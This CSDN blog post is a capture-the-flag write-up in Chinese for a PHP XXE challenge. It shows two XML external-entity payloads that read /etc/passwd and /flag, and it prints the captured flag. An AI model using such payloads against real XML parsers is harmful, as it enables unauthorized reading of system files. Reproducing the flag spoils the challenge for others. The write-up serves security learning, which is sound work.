青少年CTF—XXE

最新推荐文章于 2024-05-15 00:19:44 发布
最新推荐文章于 2024-05-15 00:19:44 发布
阅读量392 收藏 10
点赞数 11
文章标签: 青少年CTF PHP的XXE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77001831/article/details/136571211
版权

打开容器后发现就是phpinfo()的页面,上网搜索发现访问simplexml_load_string.php文件时,页面没有任何显示。

尝试进行抓包,

发送给repeater,并尝试进行命令执行。

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>
<name>
&xxe;
</name>

</test>

发现访问成功,猜想flag文件在根目录下,

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///flag">
]>
<test>
<name>
&xxe;
</name>

</test>

成功拿到flag。

qsnctf{1f525bbe2c984b6baf2de3c8d97faa88}

M's blog
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2022年ctf强网青少年题目
09-16
2022年ctf强网青少年题目
青少年ctf擂台挑战赛 2024 #round 1
04-16
青少年ctf擂台挑战赛 2024 #round 1
ctfshow xxe
m0_74940843的博客
11-16 138
XXE全称为XML External Entity Injection即XMl外部实体注入漏洞1.XXE简介 XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。 那有的小伙伴可能就会问了,那XML又是什么呢?2.XML概念 XML是可扩展的标记语言(eXtensible Markup Language),设
青少年CTF擂台挑战赛 2024 #Round 1 Web方向题解 WP 全
Jay17的博客
03-02 1436
青少年CTF擂台挑战赛 2024 #Round 1 Web方向题解 WP 全
CTF Web】QSNCTF PHP的XXE Writeup(PHP+XXE漏洞)
HEX9CF的技术博客
05-15 355
题目描述XXE(XML External Entity)是一种针对XML解析器的攻击技术,也被称为XML外部实体注入攻击。当应用程序解析用户提供的XML输入时,如果没有正确地配置或过滤外部实体,攻击者可以利用这一漏洞执行恶意操作。XML允许在文档中定义和使用外部实体,这些实体可以从外部资源(如文件、网络URL等)中获取数据。如果应用程序解析了包含恶意外部实体的XML输入,并且未对外部实体进行适当的处理或限制,攻击者可能会读取敏感文件、执行远程代码或进行其他恶意活动。
青少年CTF擂台挑战赛 2024 #Round 1
WonderL博客
04-13 500
提示上传两个pdf文件,根据提示是md5碰撞所以利用两个不同的字符串,但md5值相同修改上传的内容即可。
青少年CTF2024 #Round1 wp web
永不落的梦想
03-02 547
MD5碰撞,使用工具fastcoll生成内容不同但md5值相同的两个pdf文件上传即可获得flag;上传2.pdf和3.pdf,获取到flag;
青少年CTF——PHP特性01
2301_78684637的博客
10-10 128
青少年CTF——PHP特性01
{青少年CTF} BASE 详解
lfc18950509270的博客
08-16 530
附件下载下来里面是一串看不懂的4c4a575851324332474e324753574b594a5a574651365346474a4d4855544c5a4c423546534d444249355547365a5352485536513d3d3d3d。看到描述就知道是解码的,base家族就找base解码。丢去解密就行了,这一看就是多重加密,所以要多试。把会的Crypto的题目也写一下。用了三种不同的方式,还可以。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站...
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
ctf base全家桶递归解密
09-11
ctf base全家桶递归解密,只要是常见base(base16、base32、base58、base85、base91、base92、base100)系加密,不管加多少层都能解出来
咖啡店管理系统 (Java 版) 源代码+使用说明+可做毕设
06-17
咖啡店管理系统 (Java 版) 源代码 项目简介 这个 Java 项目是一个简单的商店管理系统。该系统处理任何咖啡酒店的业务细节。要制作这个项目,你需要 JetBrains IntelliJ IDE。这个 IDE 将为项目提供设置。你还需要 PostgreSQL 作为数据库。设计简单且用户友好。 系统介绍 关于 Java 版咖啡店管理系统,该系统处理酒店用户的管理。在使用系统之前,你需要先注册然后登录系统。从那里你可以管理你的工作空间,你可以添加客户,管理销售并进行更新。 设计非常简单,用户在操作时不会遇到困难。该项目易于操作和理解。要运行此项目,你必须在电脑上安装 Eclipse IDE 或 JetBrains IntelliJ IDE。 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
vspdconfig虚拟串口软件
06-17
用于添加虚拟串口,而不用连接硬件,方便调试。
仿真设计zzz.uvproj
最新发布
06-17
asdf.uvproj
强大且美观的WPF UI控件库:HandyControl
06-17
HandyControl是一套WPF控件库,它几乎重写了所有原生样式,同时包含80余款自定义控件。使用HandyControl你可以轻松地创建一个美观的WPF应用程序,从而大大提高开发效率。
高分项目,基于Unity3D开发实现的打砖块游戏,内含完整源码+资源
06-17
高分项目,基于Unity3D开发实现的打砖块游戏,内含完整源码+资源 一款经典的打砖块游戏,画面清晰玩法简单,运行流畅。游戏包括60个关卡,支持3种不同速度的节奏。《打砖块 高清版 Krakout HD》是一款经典的打砖块游戏,你可以自己玩也可以跟朋友一起玩双人模式,游戏有丰富的背景,大量的关卡,劲爆的音乐。PS:如果出现ERR:...
grpcio-1.7.0-cp36-cp36m-win32.whl
06-17
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
青少年ctf shellcode
03-15
青少年CTF(Capture The Flag)是一种网络安全竞赛,旨在培养年轻人的网络安全技能和解决问题的能力。Shellcode是一段用于利用计算机系统漏洞的机器码,通常用于执行特定的操作或获取系统权限。在青少年CTF中,学习和了解Shellcode可以帮助参赛者更好地理解和应对系统漏洞。 青少年CTF Shellcode通常包括以下内容: 1. Shellcode基础知识:了解Shellcode的定义、作用和使用场景。 2. Shellcode编写:学习如何编写Shellcode,包括使用汇编语言编写、了解不同操作系统的Shellcode编写方法等。 3. Shellcode注入:学习如何将Shellcode注入到目标系统中,以实现特定的攻击目标。 4. Shellcode调试与分析:学习如何调试和分析Shellcode,以便理解其具体功能和执行过程。 5. Shellcode防御与保护:学习如何防御和保护系统免受Shellcode攻击,包括使用安全编程技术和安全配置措施等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值